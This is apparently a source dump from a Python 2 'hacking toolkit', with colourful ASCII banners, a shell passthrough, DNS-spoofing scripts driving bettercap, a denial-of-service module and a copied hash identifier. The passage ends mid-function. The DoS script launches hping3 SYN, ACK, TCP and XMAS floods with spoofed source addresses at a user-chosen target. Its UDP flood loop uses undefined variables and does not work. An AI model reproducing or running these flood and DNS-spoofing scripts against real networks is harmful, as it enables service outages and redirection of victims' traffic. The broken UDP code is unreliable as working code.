██╔══██║ ██║ ██╔═██╗ 49 | ██║ ██║ ██║ ██║ ██╗ 50 | ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ 51 | \n""".decode('utf-8') 52 | 53 | def mainbanner2(): 54 | print """ 55 | ░░▒█████████ 56 | ▒▓▓█████████████ 57 | ░▓█████████████████████░ ░▒███▓ 58 | ░▓██████████████████████████████████ 59 | ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ 60 | ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ 61 | ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ 62 | ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ 63 | ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ 64 | ░▒░░░░░░▒░░░░░░░ 65 | \n""".decode('utf-8') 66 | 67 | def mainbanner3(): 68 | print """ 69 | ╔═══════════════════════════════════════════════╗ 70 | ║ ║ 71 | ║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ 72 | ║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ 73 | ║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ 74 | ║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ 75 | ║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ 76 | ║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ 77 | ║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ 78 | ║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ 79 | ║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ 80 | ║ ║ 81 | ║ ║ 82 | ╚═══════════════════════════════════════════════╝ 83 | """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) 84 | 85 | def mainbanner4(): 86 | print """\033[0m 87 | ████████████████████████████████████████████████████████████████████████████\033[91m 88 | ███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m 89 | ████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m 90 | ████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m 91 | ████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m 92 | ████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m 93 | ████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m 94 | ███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m 95 | ████████████████████████████████████████████████████████████████████████████ 96 | \033[0m\n""".decode('utf-8') 97 | 98 | def mainbanner5(): 99 | print """\033[92m 100 | 101 | █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ 102 | ███ ███ ▄█████████▄ ███▐██▀ 103 | ███ ███ ██▀▀███▀▀██ █████▀ 104 | ███▄▄▄▄███ ▀ ███ ▀ ██████▄ 105 | ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ 106 | ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m 107 | ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m 108 | █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m 109 | 110 | 111 | 112 | ███ 113 | █ █ 114 | █ █ ██ ████████ ███████ 115 | █ █ ██ ██ ██ 116 | █ █ ██ ██ █████ 117 | █ █ ▄ ██ ██ ██ 118 | █████▄▄██ ██ ██ ███████ 119 | 120 | 121 | """.decode('utf-8') 122 | 123 | def mainbanner6(): 124 | print """ 125 | • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• 126 | \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. 127 | . \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. 128 | \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ 129 | ▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. 130 | .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. 131 | \033[35m█+█ █+█ \033[0m. \033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ 132 | \033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ 133 | \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] 134 | """.decode('utf-8') 135 | def mainbanner7(): 136 | print """\033[31m 137 | ██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ 138 | ██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ 139 | ███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ 140 | ██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ 141 | ██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ 142 | ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m 143 | """.decode('utf-8') 144 | 145 | def mainbanner8(): 146 | print """\033[34m 147 | ██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ 148 | ██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ 149 | ███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ 150 | ██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ 151 | ██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ 152 | ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ 153 | \033[0m""".decode('utf-8') 154 | 155 | def mainbanner9(): 156 | print """\033[93m 157 | ██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ 158 | ██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ 159 | ███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ 160 | ██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ 161 | ██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ 162 | ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ 163 | \033[0m""".decode('utf-8') 164 | 165 | def mainbanner(): 166 | import random 167 | for x in range(10): 168 | num = random.randint(1,9) 169 | if num == 1: 170 | mainbanner1() 171 | if num == 2: 172 | mainbanner2() 173 | if num == 3: 174 | mainbanner3() 175 | if num == 4: 176 | mainbanner4() 177 | if num == 5: 178 | mainbanner5() 179 | if num == 6: 180 | mainbanner6() 181 | if num == 7: 182 | mainbanner7() 183 | if num == 8: 184 | mainbanner8() 185 | if num == 9: 186 | mainbanner9() 187 | 188 | mainbanner() 189 | -------------------------------------------------------------------------------- /commandlist/clear.py: -------------------------------------------------------------------------------- 1 | import os 2 | os.system("clear") 3 | -------------------------------------------------------------------------------- /commandlist/command.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def command(): 41 | command = raw_input("\033[1mCommand:\033[0m ") 42 | os.system(command) 43 | command() 44 | -------------------------------------------------------------------------------- /commandlist/dnsspoof-all.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def dnsspoofall(): 41 | domain1 = raw_input("\033[1mDomain1:\033[0m ") 42 | domain2 = raw_input("\033[1mDomain2:\033[0m ") 43 | os.system('echo "net.sniff on\n" >> dnsall.cap') 44 | os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) 45 | os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') 46 | os.system('echo "dns.spoof on\n" >> dnsall.cap') 47 | print '\n\033[93mto stop type "exit"\033[0m' 48 | os.system("sleep 2") 49 | os.system("bettercap -no-history -caplet dnsall.cap") 50 | os.system("rm dnsall.cap") 51 | 52 | dnsspoofall() 53 | -------------------------------------------------------------------------------- /commandlist/dnsspoof.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def dnsspoof(): 41 | target = raw_input("\033[1mTarget:\033[0m ") 42 | domain1 = raw_input("\033[1mDomain1:\033[0m ") 43 | domain2 = raw_input("\033[1mDomain2:\033[0m ") 44 | os.system('echo "net.sniff on\n" >> dns.cap') 45 | os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) 46 | os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) 47 | os.system('echo "dns.spoof on\n" >> dns.cap') 48 | print '\n\033[93mto stop type "exit"\033[0m' 49 | os.system("sleep 2") 50 | os.system("bettercap -no-history -caplet dns.cap") 51 | os.system("rm dns.cap") 52 | 53 | dnsspoof() 54 | -------------------------------------------------------------------------------- /commandlist/dos.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | import socket 26 | import socks 27 | import requests 28 | lred = '\033[91m' 29 | lblue = '\033[94m' 30 | lgreen = '\033[92m' 31 | yellow = '\033[93m' 32 | cyan = '\033[1;36m' 33 | purple = '\033[95m' 34 | red = '\033[31m' 35 | green = '\033[32m' 36 | blue = '\033[34m' 37 | orange = '\033[33m' 38 | 39 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 40 | randomcolor = random.choice(colorlist) 41 | banner3list = [red, blue, green, purple] 42 | 43 | def dos(): 44 | print """ 45 | {0}tcp: * tcp target port 46 | {1}udp: * udp target port 47 | {2}syn: * syn target port 48 | {3}ack: * ack target port 49 | {4}xmas: * xmas target port 50 | \033[0m 51 | !Press CTRL C to stop attacking! 52 | """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) 53 | try: 54 | command, target, port = raw_input("Method: ").split() 55 | if command == "tcp": 56 | os.system("service tor restart") 57 | os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) 58 | if command == "udp": 59 | try: 60 | ip = socket.gethostbyname(target) 61 | port = int(port) 62 | os.system("service tor restart") 63 | sent = 0 64 | while True: 65 | print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) 66 | sock.sendto(Gb, (ip,port)) 67 | sock.sendto(bytes, (ip,port)) 68 | sock.sendto(Kb, (ip,port)) 69 | sent = sent + 1 70 | port = port + 1 71 | if port == 65534: 72 | port = 1 73 | except: 74 | print "\nUDP flood stopped\n" 75 | os.system("") 76 | if command == "syn": 77 | os.system("service tor restart") 78 | os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) 79 | if command == "ack": 80 | os.system("service tor restart") 81 | os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) 82 | if command == "xmas": 83 | os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) 84 | except: 85 | print "\n\033[91mError: Not Enough Arguments\033[0m\n " 86 | 87 | dos() 88 | -------------------------------------------------------------------------------- /commandlist/exit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | sys.exit() 3 | -------------------------------------------------------------------------------- /commandlist/hashid.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | # coding: latin-1 3 | #if you use this code give me credit @tuf_unkn0wn 4 | #i do not give you permission to show / edit this script without my credit 5 | #to ask questions or report a problem message me on instagram @tuf_unkn0wn 6 | """ 7 | 8 | 9 | ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ 10 | ▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ 11 | ▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ 12 | ░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ 13 | ░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ 14 | ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ 15 | ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ 16 | ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ 17 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 18 | ░ ░ 19 | 20 | 21 | """ 22 | import os 23 | import sys 24 | import random 25 | lred = '\033[91m' 26 | lblue = '\033[94m' 27 | lgreen = '\033[92m' 28 | yellow = '\033[93m' 29 | cyan = '\033[1;36m' 30 | purple = '\033[95m' 31 | red = '\033[31m' 32 | green = '\033[32m' 33 | blue = '\033[34m' 34 | orange = '\033[33m' 35 | 36 | colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] 37 | randomcolor = random.choice(colorlist) 38 | banner3list = [red, blue, green, purple] 39 | 40 | def hashid(): 41 | #!/usr/bin/python 42 | # encoding: utf-8 43 | # Hash Identifier v1.1 44 | # By Zion3R 45 | # www.Blackploit.com 46 | # Root@Blackploit.com 47 | 48 | logo=''' ######################################################################### 49 | # __ __ __ ______ _____ # 50 | # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # 51 | # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # 52 | # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # 53 | # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # 54 | # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # 55 | # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # 56 | # By Zion3R # 57 | # www.Blackploit.com # 58 | # Root@Blackploit.com # 59 | #########################################################################''' 60 | 61 | algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} 62 | 63 | # hash.islower() minusculas 64 | # hash.isdigit() numerico 65 | # hash.isalpha() letras 66 | # hash.isalnum() alfanumerico 67 | 68 | def CRC16(): 69 | hs='4607' 70 | if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: 71 | jerar.append("101020") 72 | def CRC16CCITT(): 73 | hs='3d08' 74 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 75 | jerar.append("101040") 76 | def FCS16(): 77 | hs='0e5b' 78 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 79 | jerar.append("101060") 80 | 81 | def CRC32(): 82 | hs='b33fd057' 83 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 84 | jerar.append("102040") 85 | def ADLER32(): 86 | hs='0607cb42' 87 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 88 | jerar.append("102020") 89 | def CRC32B(): 90 | hs='b764a0d9' 91 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 92 | jerar.append("102060") 93 | def XOR32(): 94 | hs='0000003f' 95 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 96 | jerar.append("102080") 97 | 98 | def GHash323(): 99 | hs='80000000' 100 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 101 | jerar.append("103040") 102 | def GHash325(): 103 | hs='85318985' 104 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 105 | jerar.append("103020") 106 | 107 | def DESUnix(): 108 | hs='ZiY8YtDKXJwYQ' 109 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: 110 | jerar.append("104020") 111 | 112 | def MD5Half(): 113 | hs='ae11fd697ec92c7c' 114 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 115 | jerar.append("105060") 116 | def MD5Middle(): 117 | hs='7ec92c7c98de3fac' 118 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 119 | jerar.append("105040") 120 | def MySQL(): 121 | hs='63cea4673fd25f46' 122 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 123 | jerar.append("105020") 124 | 125 | def DomainCachedCredentials(): 126 | hs='f42005ec1afe77967cbc83dce1b4d714' 127 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 128 | jerar.append("106025") 129 | def Haval128(): 130 | hs='d6e3ec49aa0f138a619f27609022df10' 131 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 132 | jerar.append("106160") 133 | def Haval128HMAC(): 134 | hs='3ce8b0ffd75bc240fc7d967729cd6637' 135 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 136 | jerar.append("106165") 137 | def MD2(): 138 | hs='08bbef4754d98806c373f2cd7d9a43c4' 139 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 140 | jerar.append("106060") 141 | def 